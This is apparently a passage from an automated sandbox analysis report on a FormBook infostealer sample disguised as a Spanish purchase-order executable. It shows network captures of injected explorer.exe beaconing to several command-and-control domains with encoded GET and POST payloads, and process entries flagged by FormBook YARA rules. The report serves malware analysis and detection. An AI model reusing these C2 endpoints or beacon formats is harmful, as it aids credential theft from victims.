73 0e 98 b7 a2 7d ba 8a 0c 03 7f 66 c5 c7 2a 7f 83 78 a9 a4 9f 6c 8a 06 94 97 f0 9d dc ee 0b 6e 20 fe 7c 96 5f 81 be cf f4 81 30 b4 eb a8 fd 98 71 7f 9e ef 83 1f 95 55 7d ef 86 51
                                                                      Data Ascii: 133bZrzOAJrN%c$$Jbh1YJy,^;\oww~+nc<iAclo)m(}Y}_poOw5kdvY{K0+,wR2zf@We}5:|@r<aBQ$JBJ^CGU}J4\nU1<};|D\TYu_2qZEDA}'qc$>y?8(<K{?@,xnS]n77H$>e8=y~3{!VHkiUg2?Q^vTnyv?GK`Wy|?W.bSg?WmKT!u%(]?@Y~nj+W|B0$~+mvio+-o%PCG5HE!-'v8vhRJF+K5{yi{P3z8,w/<yz/M5vW!pfDNFo^uufl(Oj^UeY>PU#_)?M&F,?*{OIdo77yq,U}*eLv9Q7`k-?K)?@$V([PB-_fOM$MOG@j^H3y%^dCIyGtmyuY$P\O#W%7s}f*xln |_0qU}Q
                                                                      Feb 23, 2023 11:18:20.716834068 CET104INData Raw: e2 7d e6 bf 41 e4 61 bb fa 4b f3 7c bd 04 0c e2 5e 97 7a fa 7a c5 1c 88 37 d2 be 5b b2 de 6f fd ff a7 50 5f 16 c3 0b d0 57 35 fb 46 9e 3f 28 8b 03 cc eb 1a 32 c2 87 ad 08 84 42 93 5f 29 78 01 fc c3 62 36 e0 fe b1 87 87 11 6f c9 65 3b 55 9e 34 f5
                                                                      Data Ascii: }AaK|^zz7[oP_W5F?(2B_)xb6oe;U4'ZC{|BzUnt<Y7Od_<.e)o]-2!aF0:N#3!ce7(~%n_yDfN+qZ2
                                                                      Feb 23, 2023 11:18:20.718312979 CET105INData Raw: e6 c4 04 cc 60 b6 11 8a bd 51 03 a2 12 f9 56 59 4b 05 a9 f3 1e ab ac 14 66 a2 ac b6 16 df 35 47 8a 64 42 15 f4 84 62 4b da b2 13 25 49 4b b4 58 75 ba 4a 9f 15 5e ea 39 48 38 a5 37 eb 29 d7 6d d8 86 de 12 68 b5 96 a2 f5 58 9d 28 dd 7e cc 05 0c 98
                                                                      Data Ascii: `QVYKf5GdBbK%IKXuJ^9H87)mhX(~[53Eajc.OMmc%`Y]AZtT\}u) Y2%zFAG"`JqZWK9+9T1WD<hni~en%^t
                                                                      Feb 23, 2023 11:18:20.718359947 CET107INData Raw: 2e 67 17 27 1d 86 3d 63 53 35 fc 02 5e d2 05 ce 4e 49 5f f0 2a ff 18 f6 82 b6 d1 f6 49 23 1a cb 5d a9 57 c6 cc 67 79 74 15 9c a5 a4 b4 75 ba 8d bb d1 31 db a5 cd 74 3d a3 f5 60 4d d7 21 ec c1 45 e8 46 f4 6c ee 63 7e 67 17 11 49 96 b3 c2 3f 6e f6
                                                                      Data Ascii: .g'=cS5^NI_*I#]Wgytu1t=`M!EFlc~gI?nL3] bBj}t"\)<V3](Ch7>mPk7,hY$[SUz-%W603t*Xn;}:^'jCP'L#=MqZB{ExVl}zNm
                                                                      Feb 23, 2023 11:18:20.718390942 CET107INData Raw: 61 0d 0a 03 00 39 3a 73 ea 79 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: a9:sy'0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449701148.251.13.12680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:23.247082949 CET107OUTGET /vqh7/?hTb82V=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XwJzMQ03RKSfMg==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.gachthe365.site
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:18:23.271050930 CET109INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Thu, 23 Feb 2023 10:18:23 GMT
                                                                      Data Raw: 32 37 37 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f
                                                                      Data Ascii: 2779<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reaso
                                                                      Feb 23, 2023 11:18:23.271091938 CET110INData Raw: 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: n-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #F
                                                                      Feb 23, 2023 11:18:23.271131039 CET111INData Raw: 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20
                                                                      Data Ascii: h: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                                                      Feb 23, 2023 11:18:23.271167040 CET113INData Raw: 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67
                                                                      Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; }
                                                                      Feb 23, 2023 11:18:23.271204948 CET114INData Raw: 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 6e 42 6d 4e 53 77 62 52 56 59 68 2b 6b 4f 63 67 4d 68 76 52 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73
                                                                      Data Ascii: 8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLO
                                                                      Feb 23, 2023 11:18:23.271244049 CET115INData Raw: 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f 6e 5a 7a 78 44 71 6d 71 46 52 46 43 37 39 39 2b 64 62 45 69 72 4d 6f 56 45 58 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b
                                                                      Data Ascii: jTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQE
                                                                      Feb 23, 2023 11:18:23.271281004 CET117INData Raw: 35 52 54 64 65 43 72 73 74 79 54 31 57 70 68 55 52 54 42 65 76 42 61 56 34 69 77 59 4a 47 47 63 74 52 44 43 31 46 73 47 61 51 33 52 74 47 46 66 4c 34 6f 73 33 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52
                                                                      Data Ascii: 5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9G
                                                                      Feb 23, 2023 11:18:23.271318913 CET118INData Raw: 33 20 43 45 54 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e
                                                                      Data Ascii: 3 CET"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.44970281.169.145.7280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:28.327013016 CET119OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.frogair.online
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.frogair.online
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.frogair.online/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 33 77 6e 65 37 48 65 4e 44 33 4c 43 62 2d 76 55 6a 41 71 42 77 72 6f 52 59 54 37 41 6b 2d 52 44 78 54 6c 64 73 38 6b 55 76 56 4e 54 71 58 6e 5a 64 6d 44 59 53 75 6e 48 67 38 73 52 52 4a 42 56 58 6f 61 46 47 2d 39 71 39 72 74 70 71 34 7a 31 39 69 34 35 41 5f 7e 74 48 51 53 6a 45 62 4f 33 49 62 6a 54 62 39 53 4d 4f 56 7e 7a 46 77 77 46 73 74 34 30 43 4a 59 71 30 53 37 79 56 6c 5a 55 66 74 62 6b 73 5a 47 4c 6b 64 45 64 62 58 55 55 78 65 79 68 7a 7a 43 31 6c 69 62 33 56 6e 62 78 53 41 48 65 37 46 6a 36 71 69 77 51 57 68 6e 5f 64 67 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=3wne7HeND3LCb-vUjAqBwroRYT7Ak-RDxTlds8kUvVNTqXnZdmDYSunHg8sRRJBVXoaFG-9q9rtpq4z19i45A_~tHQSjEbO3IbjTb9SMOV~zFwwFst40CJYq0S7yVlZUftbksZGLkdEdbXUUxeyhzzC1lib3VnbxSAHe7Fj6qiwQWhn_dg).
                                                                      Feb 23, 2023 11:18:28.347426891 CET120INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 23 Feb 2023 10:18:28 GMT
                                                                      Server: Apache/2.4.55 (Unix)
                                                                      Content-Length: 196
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.44970381.169.145.7280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:30.864835024 CET120OUTGET /vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.frogair.online
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:18:30.884332895 CET121INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 23 Feb 2023 10:18:30 GMT
                                                                      Server: Apache/2.4.55 (Unix)
                                                                      Content-Length: 196
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.44970481.169.145.15880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:35.954101086 CET122OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.krankenzusatz.net
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.krankenzusatz.net
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.krankenzusatz.net/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 28 31 64 68 6f 76 37 6f 4f 61 35 49 68 2d 56 6b 36 30 34 79 78 6d 33 4c 38 37 31 55 78 5a 63 67 5a 66 55 59 56 68 67 6b 64 37 34 52 49 4b 30 6d 56 66 51 36 72 6d 54 66 52 5a 4b 54 28 33 78 30 4c 4b 50 33 7a 32 30 51 52 6b 43 71 38 4a 6c 61 6e 72 48 55 35 6c 66 78 5a 69 53 30 4e 74 4b 54 72 53 48 68 47 42 77 35 56 68 68 5f 31 45 49 52 6a 4e 49 78 57 74 76 53 42 44 6e 36 6e 72 38 46 65 38 6a 5a 54 75 61 50 59 4e 79 79 6a 36 38 4f 4d 44 64 5a 35 32 73 74 38 70 50 65 49 36 75 52 45 45 72 6f 39 78 7e 57 4d 46 6c 4f 4c 67 70 6d 56 77 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=(1dhov7oOa5Ih-Vk604yxm3L871UxZcgZfUYVhgkd74RIK0mVfQ6rmTfRZKT(3x0LKP3z20QRkCq8JlanrHU5lfxZiS0NtKTrSHhGBw5Vhh_1EIRjNIxWtvSBDn6nr8Fe8jZTuaPYNyyj68OMDdZ52st8pPeI6uREEro9x~WMFlOLgpmVw).
                                                                      Feb 23, 2023 11:18:35.975908995 CET123INHTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 23 Feb 2023 10:18:35 GMT
                                                                      Server: Apache/2.4.55 (Unix)
                                                                      Location: https://www.krankenzusatz.net/vqh7/
                                                                      Content-Length: 243
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 61 6e 6b 65 6e 7a 75 73 61 74 7a 2e 6e 65 74 2f 76 71 68 37 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/">here</a>.</p></body></html>


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:11:17:09
                                                                      Start date:23/02/2023
                                                                      Path:C:\Users\user\Desktop\Requisito de pedido #23022300.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\Desktop\Requisito de pedido #23022300.exe
                                                                      Imagebase:0x19fb1a20000
                                                                      File size:724480 bytes
                                                                      MD5 hash:8A06791059A482FAA0CF845D2B953351
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:low

                                                                      General

                                                                      Target ID:1
                                                                      Start time:11:17:12
                                                                      Start date:23/02/2023
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                      Imagebase:0xa40000
                                                                      File size:107624 bytes
                                                                      MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      Reputation:moderate

                                                                      General

                                                                      Target ID:2
                                                                      Start time:11:17:15
                                                                      Start date:23/02/2023
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff618f60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:3
                                                                      Start time:11:17:27
                                                                      Start date:23/02/2023
                                                                      Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                      Imagebase:0xb60000
                                                                      File size:23040 bytes
                                                                      MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

